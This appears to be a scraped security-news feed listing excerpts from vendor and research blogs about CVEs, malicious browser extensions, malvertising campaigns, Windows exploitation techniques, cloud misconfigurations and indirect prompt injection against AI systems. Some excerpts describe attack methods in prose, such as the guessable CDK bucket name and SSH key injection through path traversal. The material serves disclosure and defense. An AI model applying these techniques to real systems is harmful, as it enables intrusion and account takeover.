https://decoded.avast.io/salat/out-with-the-old-in-with-the-bold-gen-threat-labs/?utm_source=rss&utm_medium=rss&utm_campaign=out-with-the-old-in-with-the-bold-gen-threat-labs
How GitHub uses CodeQL to secure GitHub
How GitHub's Product Security Engineering team manages our CodeQL implementation at scale and how you can, too.
The post How GitHub uses CodeQL to secure GitHub appeared first on The GitHub Blog.
https://github.blog/engineering/how-github-uses-codeql-to-secure-github/
Stealthy AD CS Reconnaissance
Introducing a certipy parse command to perform stealthy offline AD CS enumeration based on local registry data.
https://blog.compass-security.com/2025/02/stealthy-ad-cs-reconnaissance/
1-15 November 2024 Cyber Attacks Timeline
In the first timeline of November 2024 I collected 128 events with a threat landscape dominated by malware...
https://www.hackmageddon.com/2025/02/06/1-15-november-2024-cyber-attacks-timeline/
Lazarus Group Targets Organizations with Sophisticated LinkedIn Recruiting Scam
Bitdefender Labs warns of an active campaign by the North Korea-linked Lazarus Group, targeting organizations by capturing credentials and delivering malware through fake LinkedIn job offers.
LinkedIn may be a vital tool for job seekers and professionals, but it has also become a playground for cybercriminals exploiting its credibility. From fake job offers and elaborate phishing schemes to scams and even state-sponsored threat actors who prey on people's career aspirations and trust in profess
https://www.bitdefender.com/en-us/blog/labs/lazarus-group-targets-organizations-with-sophisticated-linkedin-recruiting-scam
Analysis of an advanced malicious Chrome extension
Two weeks ago I published an article on 63 malicious Chrome extensions. In most cases I could only identify the extensions as malicious. With large parts of their logic being downloaded from some web servers, it wasn't possible to analyze their functionality in detail.
However, for the Download Manager Integration Checklist extension I have all parts of the puzzle now. This article is a technical discussion of its functionality that somebody tried very hard to hide. I was also able to identify a number of related extensions that were missing from my previous article.
Update (2025-02-04): An update to Download Manager Integration Checklist extension has been released a day before I published this article, clearly prompted by me asking adindex about this. The update removes the malicious functionality...
https://palant.info/2025/02/03/analysis-of-an-advanced-malicious-chrome-extension/
Windows Bug Class: Accessing Trapped COM Objects with IDispatch
Posted by James Forshaw, Google Project Zero
Object orientated remoting technologies such as DCOM and .NET Remoting make it very easy to develop an object-orientated interface to a service which can cross process and security boundaries. This is because they're designed to support a wide range of objects, not just those implemented in the service, but any other object compatible with being remoted. For example, if you wanted to expose an XML document across the client-server boundary, you could use a pre-existing COM or .NET library and return that object back to the client. By default when the object is returned it's marshaled by reference, which results in the object staying in the out-of-process server.
This flexibility has a number of downsides, one of which is the topic of this...
https://googleprojectzero.blogspot.com/2025/01/windows-bug-class-accessing-trapped-com.html
Windows Exploitation Tricks: Trapping Virtual Memory Access (2025 Update)
Posted by James Forshaw, Google Project Zero
Back in 2021 I wrote a blog post about various ways you can build a virtual memory access trap primitive on Windows. The goal was to cause a reader or writer of a virtual memory address to halt for a significant (e.g. 1 or more seconds) amount of time, generally for the purpose of exploiting TOCTOU memory access bugs in the kernel.
The solutions proposed in the blog post were to either map an SMB file on a remote server, or abuse the Cloud Filter API. This blog isn't going to provide new solutions, instead I wanted to highlight a new feature of Windows 11 24H2 that introduces the ability to abuse the SMB file server directly on the local machine, no remote server required. This change also introduces the ability to locally exploit vulnerabilities...
https://googleprojectzero.blogspot.com/2025/01/windows-exploitation-tricks-trapping.html
Path traversal issue in Deep Java Library - (CVE-2025-0851)
Publication Date: 2025/01/29 1:30 PM PST
AWS identified CVE-2025-0851, a path traversal issue in ZipUtils.unzip and TarUtils.untar in Deep Java Library (DJL) on all platforms that allows a bad actor to write files to arbitrary locations. If leveraged, an actor could gain SSH access by injecting an SSH key into the authorized_keys file, or upload HTML files to leverage cross-site scripting issues. We can confirm that this issue has not been leveraged. A fix for this issue has been released and we recommend the users of DJL upgrade to version 0.31.1 or later.
Affected versions: 0.1.0 - 0.31.0
Resolution
The patches are included in DJL 0.31.1.
Reference
CVE-2025-0851
GHSA-6h2x-4gjf-jc5w
Please email aws-security@amazon.com with any security questions or concerns.
https://aws.amazon.com/security/security-bulletins/AWS-2025-003/
How we kept the Google Play & Android app ecosystems safe in 2024
Posted by Bethel Otuteye and Khawaja Shams (Android Security and Privacy Team), and Ron Aquino (Play Trust and Safety)
Android and Google Play comprise a vibrant ecosystem with billions of users around the globe and millions of helpful apps. Keeping this ecosystem safe for users and developers remains our top priority. However, like any flourishing ecosystem, it also attracts its share of bad actors. That's why every year, we continue to invest in more ways to protect our community and fight bad actors, so users can trust the apps they download from Google Play and developers can build thriving businesses.
Last year, those investments included AI-powered threat detection, stronger privacy policies, supercharged developer tools, new industry-wide alliances, and more. As a result, we...
http://security.googleblog.com/2025/01/how-we-kept-google-play-android-app-ecosystem-safe-2024.html
How we estimate the risk from prompt injection attacks on AI systems
Posted by the Agentic AI Security Team at Google DeepMind
Modern AI systems, like Gemini, are more capable than ever, helping retrieve data and perform actions on behalf of users. However, data from external sources present new security challenges if untrusted sources are available to execute instructions on AI systems. Attackers can take advantage of this by hiding malicious instructions in data that are likely to be retrieved by the AI system, to manipulate its behavior. This type of attack is commonly referred to as an "indirect prompt injection," a term first coined by Kai Greshake and the NVIDIA team. To mitigate the risk posed by this class of attacks, we are actively deploying defenses within our AI systems along with measurement and monitoring tools. One of these tools is a robust evaluation...
http://security.googleblog.com/2025/01/how-we-estimate-risk-from-prompt.html
BloodHound Community Edition Custom Queries
This blog post introduces our new custom queries for BloodHound Community Edition (CE) and explains how you can use them effectively to analyze your Active Directory infrastructure. TL;DR: Check out our new BloodHound CE custom queries! Active Directory and BloodHound The majority of our customers run a Microsoft Active Directory infrastructure, either exclusively on-prem or […]
https://blog.compass-security.com/2025/01/bloodhound-community-edition-custom-queries/
Privacy-Preserving Federated Learning – Future Collaboration and Continued Research
This post is the final blog in a series on privacy-preserving federated learning. The series is a collaboration between NIST and the UK government's Responsible Technology Adoption Unit (RTA), previously known as the Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or RTA's blog.
Reflections and Wider Considerations
This is the final post in the series that began with reflections and learnings from the first US-UK collaboration working with Privacy Enhancing Technologies (PETs). Since the PETs Prize
https://www.nist.gov/blogs/cybersecurity-insights/privacy-preserving-federated-learning-future-collaboration-and
Android enhances theft protection with Identity Check and expanded features
Posted by Jianing Sandra Guo, Product Manager, Android, Nataliya Stanetsky, Staff Program Manager, Android
Today, people around the world rely on their mobile devices to help them stay connected with friends and family, manage finances, keep track of healthcare information and more – all from their fingertips. But a stolen device in the wrong hands can expose sensitive data, leaving you vulnerable to identity theft, financial fraud and privacy breaches.
This is why we recently launched Android theft protection, a comprehensive suite of features designed to protect you and your data at every stage – before, during, and after device theft. As part of our commitment to help you stay safe on Android, we're expanding and enhancing these features to deliver even more robust protection...
http://security.googleblog.com/2025/01/android-theft-protection-identity-check-expanded-features.html
ClamAV 1.4.2 and 1.0.8 security patch versions published
Today, we are publishing the 1.4.2 and 1.0.8 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version.
1.4.2
ClamAV 1.4.2 is a patch release with the following fixes:
CVE-2025-20128: Fixed a possible buffer overflow read bug in the OLE2 file parser that could cause a denial-of-service (DoS) condition. This issue was introduced in version 1.0.0 and affects all currently supported versions. It will be fixed in: 1.4.2 and 1.0.8. Thank you to OSS-Fuzz for identifying this issue.
1.0.8
ClamAV 1.0.8 is a patch release with the following fixes:
CVE-2025-20128:...
http://blog.clamav.net/2025/01/clamav-142-and-108-security-patch.html
Continued Scanning for CVE-2023-1389
TP-Link draws the attention of the US Government.
https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
October 2024 Cyber Attacks Statistics
After the cyber attacks timelines, it's time to publish the statistics for October 2024 where I collected and analyzed 240 events...
https://www.hackmageddon.com/2025/01/21/october-2024-cyber-attacks-statistics/
Malicious extensions circumvent Google's remote code ban
As noted last week I consider it highly problematic that Google for a long time allowed extensions to run code they downloaded from some web server, an approach that Mozilla prohibited long before Google even introduced extensions to their browser. For years this has been an easy way for malicious extensions to hide their functionality. When Google finally changed their mind, it wasn't in form of a policy but rather a technical change introduced with Manifest V3.
As with most things about Manifest V3, these changes are meant for well-behaving extensions where they in fact improve security. As readers of this blog probably know, those who want to find loopholes will find them: I've already written about the Honey extension bundling its own JavaScript interpreter and malicious extensions...
https://palant.info/2025/01/20/malicious-extensions-circumvent-googles-remote-code-ban/
OSV-SCALIBR: A library for Software Composition Analysis
Posted by Erik Varga, Vulnerability Management, and Rex Pan, Open Source Security Team
In December 2022, we announced OSV-Scanner, a tool to enable developers to easily scan for vulnerabilities in their open source dependencies. Together with the open source community, we've continued to build this tool, adding remediation features, as well as expanding ecosystem support to 11 programming languages and 20 package manager formats. Today, we're excited to release OSV-SCALIBR (Software Composition Analysis LIBRary), an extensible library for SCA and file system scanning. OSV-SCALIBR combines Google's internal vulnerability management expertise into one scanning library with significant new capabilities such as:
SCA for installed packages, standalone binaries, as well as source code
OSes...
http://security.googleblog.com/2025/01/osv-scalibr-library-for-software.html
16-31 October 2024 Cyber Attacks Timeline
In the second timeline of October 2024 I collected 120 events with a threat landscape dominated by malware...
https://www.hackmageddon.com/2025/01/16/16-31-october-2024-cyber-attacks-timeline/
Hardcoded Encryption Key Used for Named Pipe Communication
A use of hard-coded cryptographic key (CWE-321) vulnerability in FortiClient Windows may allow a low-privileged user to decrypt interprocess communication by monitoring a named pipe. Revised on 2025-04-16 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-216
Integer Overflow in ipsec ike
An Integer Overflow or Wraparound vulnerability [CWE-190] in FortiOS and FortiSASE FortiOS tenant IPsec IKEv1 service may allow an authenticated attacker to crash the IPsec tunnel via crafted requests, resulting in potential denial of service. Revised on 2025-04-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-267
Chrome Web Store is a mess
Let's make one thing clear first: I'm not singling out Google's handling of problematic and malicious browser extensions because it is worse than Microsoft's for example. No, Microsoft is probably even worse but I never bothered finding out. That's because Microsoft Edge doesn't matter, its market share is too small. Google Chrome on the other hand is used by around 90% of the users world-wide, and one would expect Google to take their responsibility to protect its users very seriously, right? After all, browser extensions are one selling point of Google Chrome, so certainly Google would make sure they are safe?
Unfortunately, my experience reporting numerous malicious or otherwise problematic browser extensions speaks otherwise. Google appears to take the “least effort required”...
https://palant.info/2025/01/13/chrome-web-store-is-a-mess/
BIScience: Collecting browsing history under false pretenses
This is a guest post by a researcher who wants to remain anonymous. You can contact the author via email.
Recently, John Tuckner of Secure Annex and Wladimir Palant published great research about how BIScience and its various brands collect user data. This inspired us to publish part of our ongoing research to help the extension ecosystem be safer from bad actors.
This post details what BIScience does with the collected data and how their public disclosures are inconsistent with actual practices, based on evidence compiled over several years.
Screenshot of claims on the BIScience website
Contents
Who is BIScience?
BIScience collects data from millions of users
BIScience buys data from partner third-party extensions
BIScience receives raw...
https://palant.info/2025/01/13/biscience-collecting-browsing-history-under-false-pretenses/
The Dangers of DNS Hijacking
How expired domains and improper DNS management can lead to severe security risks like MitM attacks, fraudulent TLS/SSL certifications, and more.
https://www.f5.com/labs/articles/threat-intelligence/the-dangers-of-dns-hijacking
ClamAV 1.4 as Next Long-Term Stable (LTS)
We are excited to announce that ClamAV 1.4 is now designated as our latest Long-Term Stable (LTS) release. Previously, we planned to announce 1.5 as the next LTS version at the end of 2024. However, unforeseen challenges have delayed the 1.5 release, leading us to choose version 1.4 for long-term support. We apologize for any inconvenience that our delay in the announcement may have caused. The version support dates for ClamAV 1.4 are amended as follows:
Key Dates:
Initial 1.4 Release Date: August 15, 2024
Patch Versions Continue Until: August 15, 2027
DB Downloads Allowed Until: August 15, 2028
For specific details, please read the ClamAV EOL Policy. Looking ahead, the beta version of ClamAV 1.5 will soon be available for community review. This version will...
http://blog.clamav.net/2025/01/clamav-14-as-next-long-term-stable-lts.html
How extensions trick CWS search
A few months ago I searched for “Norton Password Manager” in Chrome Web Store and got lots of seemingly unrelated results. Not just that, the actual Norton Password Manager was listed last. These search results are still essentially the same today, only that Norton Password Manager moved to the top of the list:
I was stumped how Google managed to mess up search results so badly and even posted the following on Mastodon:
Interesting. When I search for “Norton Password Manager” on Chrome Web Store, it first lists five completely unrelated extensions, and only the last search result is the actual Norton Password Manager. Somebody told me that website is run by a company specializing in search, so this shouldn't be due to incompetence, right? What is it then?
Somebody suggested that...
https://palant.info/2025/01/08/how-extensions-trick-cws-search/
1-15 October 2024 Cyber Attacks Timeline
In the first timeline of October 2024, I collected 120 events (8 events/day) with a threat landscape...
https://www.hackmageddon.com/2025/01/07/1-15-october-2024-cyber-attacks-timeline/
The Windows Registry Adventure #5: The regf file format
Posted by Mateusz Jurczyk, Google Project Zero
As previously mentioned in the second installment of the blog post series ("A brief history of the feature"), the binary format used to encode registry hives from Windows NT 3.1 up to the modern Windows 11 is called regf. In a way, it is quite special, because it represents a registry subtree simultaneously on disk and in memory, as opposed to most other common file formats. Documents, images, videos, etc. are generally designed to store data efficiently on disk, and they are subsequently parsed to and from different in-memory representations whenever they are read or written. This seems only natural, as offline storage and RAM come with different constraints and requirements. On disk, it is important that the data is packed as...
https://googleprojectzero.blogspot.com/2024/12/the-windows-registry-adventure-5-regf.html
NIST's International Cybersecurity and Privacy Engagement Update – New Translations
As the year comes to a close, NIST continues to engage with our international partners to strengthen cybersecurity, including sharing over ten new international translations in over six languages as resources for our stakeholders around the world. These efforts were complemented by discussions on opportunities for future enhanced international collaboration and resource sharing. Here are some updates from the past few months: Our international engagement continues through our support to the Department of State and the International Trade Administration (ITA) during numerous international
https://www.nist.gov/blogs/cybersecurity-insights/nists-international-cybersecurity-and-privacy-engagement-update-new
Credentials can be dumped from memory
A Cleartext Storage of Sensitive Information vulnerability [CWE-312] in FortiClient Windows and FortiClient Linux may permit a local authenticated user to retrieve the VPN password via a memory dump, due to JavaScript's garbage collector.
Revised on 2025-04-22 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-278
2025 Cybersecurity Predictions
“I never think of the future. It comes soon enough.”
https://www.f5.com/labs/articles/cisotociso/2025-cybersecurity-predictions
The Qualcomm DSP Driver - Unexpectedly Excavating an Exploit
Posted by Seth Jenkins, Google Project Zero
This blog post provides a technical analysis of exploit artifacts provided to us by Google's Threat Analysis Group (TAG) from Amnesty International. Amnesty’s report on these exploits is available here. Thanks to both Amnesty International and Google's Threat Analysis Group for providing the artifacts and collaborating on the subsequent technical analysis!
Introduction
Earlier this year, Google's TAG received some kernel panic logs generated by an In-the-Wild (ITW) exploit. Those logs kicked off a bug hunt that led to the discovery of 6 vulnerabilities in one Qualcomm driver over the course of 2.5 months, including one issue that TAG reported as ITW. This blog post covers the details of the original artifacts, each of the bugs discovered,...
https://googleprojectzero.blogspot.com/2024/12/qualcomm-dsp-driver-unexpectedly-excavating-exploit.html
Dirty DAG - Azure Apache Airflow Integration Vulnerabilities
Unit 42 researchers identified vulnerabilities in the Azure Data Factory's integration with Apache Airflow. These vulnerabilities include misconfigured Kubernetes Role-Based Access Control (RBAC), improper secret handling in Azure's internal Geneva service, and weak authentication mechanisms.
Exploiting these flaws, attackers could gain shadow admin control over Azure infrastructure by crafting malicious DAG files or compromising service principals, leading to unauthorized access, data exfiltration, malware deployment, and persistent control of the cluster.
Once attackers gain access, they can escalate privileges within the Azure Kubernetes Service (AKS) cluster, compromise containerized environments, and exploit Azure's Geneva service to manipulate logs and metrics.
The research highlighted...
https://www.cloudvulndb.org/azure-airflow-vulnerabilities
Ways to Mitigate Risk in Cybersecurity: Cybersecurity Risk Management
Cyber threats can wreak havoc on businesses, from data breaches to loss of reputation. Luckily, there are effective strategies available that can reduce cybersecurity risk. Avoidance is one of the...
The post Ways to Mitigate Risk in Cybersecurity: Cybersecurity Risk Management appeared first on Hacker Combat.
https://www.hackercombat.com/cybersecurity-risk-management/
Windows Tooling Updates: OleView.NET
Posted by James Forshaw, Google Project Zero
This is a short blog post about some recent improvements I've been making to the OleView.NET tool which has been released as part of version 1.16. The tool is designed to discover the attack surface of Windows COM and find security vulnerabilities such as privilege escalation and remote code execution. The updates were recently presented at the Microsoft Bluehat conference in Redmond under the name "DCOM Research for Everyone!". This blog expands on the topics discussed to give a bit more background and detail that couldn't be fit within the 45-minute timeslot. This post assumes a knowledge of COM as I'm only going to describe a limited number of terms.
Using the OleView.NET Tooling
Before we start the discussion it's important...
https://googleprojectzero.blogspot.com/2024/12/windows-tooling-updates-oleviewnet.html
Issue with DynamoDB local - CVE-2022-1471
Publication Date: 2024/12/11 2:00PM PST
AWS is aware of CVE-2022-1471 in SnakeYaml software, included in DynamoDB local jar and Docker distributions from version 1.21 and version 2.0. If leveraged, this issue could allow an actor to perform remote code execution using SnakeYaml's Constructor(), as the software does not restrict the types that can be instantiated during deserialization. AWS has found no evidence that this issue has been leveraged; however, customers should still take action. On November 6, 2024, we released a fix for this issue. Customers should upgrade DynamoDB local to the latest version: v1.25.1 and above, or 2.5.3 and above.
Please email aws-security@amazon.com with any security questions or concerns.
https://aws.amazon.com/security/security-bulletins/AWS-2024-014/
Scanning For Credentials, and BotPoke Changes IPs Again
Nearly 50% of observed traffic is looking for accidentally exposed data.
https://www.f5.com/labs/articles/threat-intelligence/scanning-for-credentials-and-botpoke-changes-ips-again
Data Pipeline Challenges of Privacy-Preserving Federated Learning
This post is part of a series on privacy-preserving federated learning. The series is a collaboration between NIST and the UK government's Responsible Technology Adoption Unit (RTA), previously known as the Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or RTA's blog.
Introduction
In this post, we talk with Dr. Xiaowei Huang and Dr. Yi Dong (University of Liverpool) and Sikha Pentyala (University of Washington Tacoma), who were winners in the UK-US PETs Prize Challenges. We discuss real-world data
https://www.nist.gov/blogs/cybersecurity-insights/data-pipeline-challenges-privacy-preserving-federated-learning
Predictions 2025: The Future of Cybersecurity Unveiled
The digital world is evolving at breakneck speed. In 2025, we're set to witness transformative changes in cybersecurity that will redefine trust, security, and how we navigate our digital lives. Here's what we see coming: Read the full blog to explore the trends in depth. The future of cybersecurity will demand both solutions and vigilance. […]
The post Predictions 2025: The Future of Cybersecurity Unveiled appeared first on Avast Threat Labs.
https://decoded.avast.io/threatintel/predictions-2025-the-future-of-cybersecurity-unveiled/?utm_source=rss&utm_medium=rss&utm_campaign=predictions-2025-the-future-of-cybersecurity-unveiled
Zero Trust Architecture
Zero trust security takes a “never trust, always verify” approach to access control. Access is only granted once an individual’s identity and context have been confirmed through multifactor authentication and...
The post Zero Trust Architecture appeared first on Hacker Combat.
https://www.hackercombat.com/zero-trust-architecture/
What Is a Security Operations Center (SOC)?
A Security Operations Center (SOC) specializes in monitoring and analyzing data to detect cyber threats and prevent attacks from them. They work to sort actual threats from false positives before...
The post What Is a Security Operations Center (SOC)? appeared first on Hacker Combat.
https://www.hackercombat.com/soc/
XDR vs SIEM Security Information and Event Management
The Extended Detection and Response Platform (XDR) ingestion and correlation technology captures and correlates high-fidelity data across your security layers, such as endpoint, network, logs, cloud services and identities to...
The post XDR vs SIEM Security Information and Event Management appeared first on Hacker Combat.
https://www.hackercombat.com/xdr-vs-siem/
Best Free EDR for Windows PC
Endpoint detection and response (EDR) tools offer businesses that employ hybrid work models or remote employees an extra layer of cybersecurity protection. Utilizing artificial intelligence (AI) and machine learning (ML),...
The post Best Free EDR for Windows PC appeared first on Hacker Combat.
https://www.hackercombat.com/best-free-edr-tools-for-windows-pc/
Free EDR Solutions for Home Users in 2025
EDR can detect and respond to emerging and advanced cyber threats quickly and efficiently, making it an essential component of modern business ecosystems. Beyond signature-based detection capabilities, its features go...
The post Free EDR Solutions for Home Users in 2025 appeared first on Hacker Combat.
https://www.hackercombat.com/free-edr-solutions/
Simple macOS kernel extension fuzzing in userspace with IDA and TinyInst
Posted by Ivan Fratric, Google Project Zero
Recently, one of the projects I was involved in had to do with video decoding on Apple platforms, specifically AV1 decoding. On Apple devices that support AV1 video format (starting from Apple A17 iOS / M3 macOS), decoding is done in hardware. However, despite this, during decoding, a large part of the AV1 format parsing happens in software, inside the kernel, more specifically inside the AppleAVD kernel extension (or at least, that used to be the case in macOS 14/ iOS 17). As fuzzing is one of the techniques we employ regularly, the question of how to effectively fuzz this code inevitably came up.
It should be noted that I wasn’t the first person to look into the problem of Apple kernel extension fuzzing, so before going...
https://googleprojectzero.blogspot.com/2024/11/simple-macos-kernel-extension-fuzzing.html
Kicking-Off with a December 4th Workshop, NIST is Revisiting and Revising Foundational Cybersecurity Activities for IoT Device Manufacturers, NIST IR 8259!
In May 2020, NIST published Foundational Cybersecurity Activities for IoT Device Manufacturers (NIST IR 8259), which describes recommended cybersecurity activities that manufacturers should consider performing before their IoT devices are sold to customers. These foundational cybersecurity activities can help manufacturers lessen the cybersecurity-related efforts needed by customers, which in turn can reduce the prevalence and severity of IoT device compromises and the attacks performed using compromised devices. In the nearly five years since this document was released, it has been published
https://www.nist.gov/blogs/cybersecurity-insights/kicking-december-4th-workshop-nist-revisiting-and-revising-foundational
Gen Q3/2024 Threat Report
The third quarter threat report is here—and it's packed with answers. Our Threat Labs team has uncovered some heavy stories behind the stats, exposing the relentless tactics shaping today's threat landscape. Here's what you need to know: This is just the surface. Read the full report and see how our Threat Labs team is relentlessly […]
The post Gen Q3/2024 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/gen-q3-2024-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=gen-q3-2024-threat-report
Inside Bitdefender Labs' Investigation of a Malicious Facebook Ad Campaign Targeting Bitwarden Users
Throughout 2024, Bitdefender Labs has been closely monitoring a series of malvertising campaigns that exploit popular platforms to spread malware. These campaigns use fake advertisements to lure users into installing malicious software disguised as legitimate apps or updates.
One of the more recent campaigns Bitdefender Labs uncovered involves a fake Bitwarden extension advertised on Meta's social media platform Facebook. The campaign tricks users into installing a harmful browser extension und
https://www.bitdefender.com/en-us/blog/labs/inside-bitdefender-labs-investigation-of-a-malicious-facebook-ad-campaign-targeting-bitwarden-users
Unlocking Cybersecurity Talent: The Power of Apprenticeships
Cybersecurity is a fast-growing field, with a constant need for skilled professionals. But unlike other professions — like medicine or aviation — there's no clear-cut pathway to qualifying for cybersecurity positions. For employers and job seekers alike, this can make the journey to building a team (or entering a successful cybersecurity career) feel uncertain. Enter the registered apprenticeship program — a proven method for developing skilled talent in cybersecurity that benefits both the employer and the new professional. Let's commit to supporting this important talent development approach
https://www.nist.gov/blogs/cybersecurity-insights/unlocking-cybersecurity-talent-power-apprenticeships
Digital Identities: Getting to Know the Verifiable Digital Credential Ecosystem
If you are interested in the world of digital identities, you have probably heard some of the buzzwords that have been floating around for a few years now… “verifiable credential,” “digital wallet,” “mobile driver's license” or “mDL.” These terms, among others, all reference a growing ecosystem around what we are calling “verifiable digital credentials.” But what exactly is a verifiable digital credential? Take any physical credential you use in everyday life – your driver's license, your medical insurance card, a certification or diploma – and turn it into a digital format stored on your
https://www.nist.gov/blogs/cybersecurity-insights/digital-identities-getting-know-verifiable-digital-credential-ecosystem
ModeLeak: LLM Model Exfiltration Vulnerability in Vertex AI
A vulnerability in GCP's Vertex AI service allows privilege escalation and unauthorized access to sensitive LLM models. Attackers can exfiltrate these models by exploiting misconfigurations in access controls and service bindings.
By exploiting custom job permissions, researchers were able to escalate their privileges and gain unauthorized access to all data services in the project.
In addition, deploying a poisoned model in Vertex AI led to the exfiltration of all other fine-tuned models, posing a proprietary and sensitive data exfiltration attack risk.
https://www.cloudvulndb.org/gcp-vertexai-vulnerabilities
Issue with data.all (Multiple CVEs)
Publication Date: 2024/11/8 4:00 PM PDT
Data.all is an open source development framework to help customers build a data marketplace on AWS.
We have identified the following issues within data.all versions 1.0.0 through 2.6.0. On November 8, 2024, we released a fix and recommend customers upgrade to version 2.6.1 or later and ensure any forked or derivative code is patched to incorporate the new fixes.
CVE-2024-52311 relates to an issue where data.all does not invalidate authentication token upon user logout.
CVE-2024-52312 relates to an issue where data.all authenticated users can perform restricted operations against DataSets and Environments.
CVE-2024-52313 relates to an issue where data.all authenticated users can obtain incorrect object level authorizations.
CVE-2024-52314...
https://aws.amazon.com/security/security-bulletins/AWS-2024-013/
From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code
Posted by the Big Sleep team
Introduction
In our previous post, Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models, we introduced our framework for large-language-model-assisted vulnerability research and demonstrated its potential by improving the state-of-the-art performance on Meta's CyberSecEval2 benchmarks. Since then, Naptime has evolved into Big Sleep, a collaboration between Google Project Zero and Google DeepMind.
Today, we're excited to share the first real-world vulnerability discovered by the Big Sleep agent: an exploitable stack buffer underflow in SQLite, a widely used open source database engine. We discovered the vulnerability and reported it to the developers in early October, who fixed it on the same day. Fortunately, we found...
https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.html
Repo swatting attack deletes/blocks GitHub and GitLab accounts
A technique called "repo swatting" allows attackers to get GitHub accounts deleted and GitLab accounts blocked by exploiting file upload features and abuse reporting mechanisms. Attackers upload malicious files to a target's repository, then report the account for hosting malicious content, potentially resulting in account deletion. The vulnerability was partially mitigated by October 2024 via changes in upload URL paths and a requirement for each uploader to be authenticated (in GitHub).
https://www.cloudvulndb.org/repo-swatting-attack-deletes-github-gitlab-accounts
The Karma connection in Chrome Web Store
Somebody brought to my attention that the Hide YouTube Shorts extension for Chrome changed hands and turned malicious. I looked into it and could confirm that it contained two undisclosed components: one performing affiliate fraud and the other sending users' every move to some Amazon cloud server. But that wasn't all of it: I discovered eleven more extensions written by the same people. Some contained only the affiliate fraud component, some only the user tracking, some both. A few don't appear to be malicious yet.
While most of these extensions were supposedly developed or bought by a person without any other traces online, one broke this pattern. Karma shopping assistant has been on Chrome Web Store since 2020, the company behind it founded in 2013. This company employs more than...
https://palant.info/2024/10/30/the-karma-connection-in-chrome-web-store/
Unmasking the SYS01 Infostealer Threat: Bitdefender Labs Tracks Global Malvertising Campaign Targeting Meta Business Pages
In a world run by advertising, businesses and organizations are not the only ones using this powerful tool. Cybercriminals have a knack for exploiting the engine that powers online platforms by corrupting the vast reach of advertising to distribute malware en masse.
While legitimate businesses rely on ads to reach new audiences, hackers exploit these platforms to trick users into downloading harmful software. Malicious ads often seem to promote legitimate software, streaming services, or produc
https://www.bitdefender.com/en-us/blog/labs/unmasking-the-sys01-infostealer-threat-bitdefender-labs-tracks-global-malvertising-campaign-targeting-meta-business-pages
Staff Stories Spotlight Series: Cybersecurity Awareness Month 2024
This blog is part of a larger NIST series during the month of October for Cybersecurity Awareness Month, called 'Staff Stories Spotlight.' Throughout the month of October this year, Q&A style blogs will be published featuring some of our unique staff members who have interesting backgrounds, stories to tell, and projects in the world of cybersecurity. This year's Cybersecurity Awareness Month theme is 'Secure our World.' How does this theme resonate with you, as someone working in cybersecurity? Now more than ever, the use of technology is central to our lives. It is the means by which we are
https://www.nist.gov/blogs/cybersecurity-insights/staff-stories-spotlight-series-cybersecurity-awareness-month-2024-1
Cloud Security Essentials
Cloud security involves employing perimeter defenses like firewalls, IDPSs and VPNs as well as guaranteeing isolation through network segmentation and virtual LANs while monitoring traffic for anomalies and threats –...
The post Cloud Security Essentials appeared first on Hacker Combat.
https://www.hackercombat.com/cloud-security/
Antivirus Software
Antivirus software protects devices against viruses, malware, and other cyberthreats by detecting, quarantining, and deleting malicious code. Modern antivirus products also offer additional security features such as password protection, identity...
The post Antivirus Software appeared first on Hacker Combat.
https://www.hackercombat.com/antivirus-software/
The Windows Registry Adventure #4: Hives and the registry layout
Posted by Mateusz Jurczyk, Google Project Zero
To a normal user or even a Win32 application developer, the registry layout may seem simple: there are five root keys that we know from Regedit (abbreviated as HKCR, HKLM, HKCU, HKU and HKCC), and each of them contains a nested tree structure that serves a specific role in the system. But as one tries to dig deeper and understand how the registry really works internally, things may get confusing really fast. What are hives? How do they map or relate to the top-level keys? Why are some HKEY root keys pointing inside of other root keys (e.g. HKCU being located under HKU)? These are all valid questions, but they are difficult to answer without fully understanding the interactions between the user-mode Registry API and the kernel-mode registry...
https://googleprojectzero.blogspot.com/2024/10/the-windows-registry-adventure-4-hives.html
How to Protect Against Ransomware Attacks?
Criminal hackers employ ransomware attacks against their targets by encrypting their data and demanding that a ransom be paid within an allotted timeframe or risk losing it forever. When an...
The post How to Protect Against Ransomware Attacks? appeared first on Hacker Combat.
https://www.hackercombat.com/protect-against-ransomware-attacks/
AWS CDK Bucket Squatting Risk
The AWS Cloud Development Kit (CDK) is a way of deploying infrastructure-as-code. The vulnerability involves AWS CDK's use of a predictable S3 bucket name format (cdk-{Qualifier}-assets-{Account-ID}-{Region}), where the default “random” qualifier (hnb659fds) is common and easily guessed. If an AWS customer deletes this bucket and reuses CDK, an attacker who claims the bucket can inject malicious CloudFormation templates, potentially gaining admin access. Attackers supposedly only need the AWS account ID to prepare the bucket in various regions, exploiting the default naming convention. However, it is important to note that the additional conditions greatly lower the likelihood of exploitation. The victim must use the CDK, having deleted the bucket, and then subsequently attempt to...
https://www.cloudvulndb.org/aws-cdk-squatting
IoT Assignment Completed! Report on Barriers to U.S. IoT Adoption
The 16 members of the NIST-managed Internet of Things (IoT) Advisory Board have completed their report on barriers to the U.S. receiving the benefits of IoT adoption, along with their recommendations for overcoming those barriers. As Benson Chan (Chair) and Dan Caprio (Vice Chair) of the IoT Advisory Board state in the report: “The United States is in the early stages of a profound transformation, one that is driven by economic, societal, and cultural innovations brought about by the IoT. These innovations intertwine connectivity and digital innovation with the opportunity to drive a
https://www.nist.gov/blogs/cybersecurity-insights/iot-assignment-completed-report-barriers-us-iot-adoption
Missing JWT issuer and signer validation in ALB middleware
https://www.cloudvulndb.org/missing-jwt-issuer
Data exfil via VPC endpoint denials in CloudTrail
CloudTrail delivered events to the resource owner and API caller even when the API action was denied by the VPC endpoint policy.
